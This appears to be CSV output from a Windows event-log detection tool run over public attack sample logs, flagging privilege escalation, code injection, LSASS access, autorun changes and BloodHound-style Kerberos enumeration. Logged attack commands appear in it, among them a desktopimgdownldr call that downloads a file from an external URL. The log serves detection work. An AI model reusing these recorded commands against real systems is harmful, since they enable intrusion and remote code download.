2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: spooler.exe payload.bin : Path: C:\Users\Public\tools\cinj\spooler.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: chost.exe payload.bin : Path: C:\Users\Public\tools\evasion\chost.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Conhost Parent Process Executions,,rules/sigma/process_creation/win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\desktopimgdownldr.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Download LockScreen Image : URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx
2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: explorer.exe /root,""c:\windows\System32\calc.exe"" : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation/win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: ECORP\Administrator : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\win32calc.exe"" : Path: C:\Windows\System32\win32calc.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\System32\calc.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx
2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx
2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx
2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx
2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATACORE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PKI01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: EXCHANGE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WSUS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: DHCP01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATANIDS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PRTG-MON$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ADFS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEBIIS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS03VULN$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59919 : LogonID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59920 : LogonID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59921 : LogonID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59993 : LogonID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60017 : LogonID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60018 : LogonID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60019 : LogonID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ATACORE01$ : Workstation: - : IP Address: 10.23.42.30 : Port: 62476 : LogonID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59641 : LogonID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
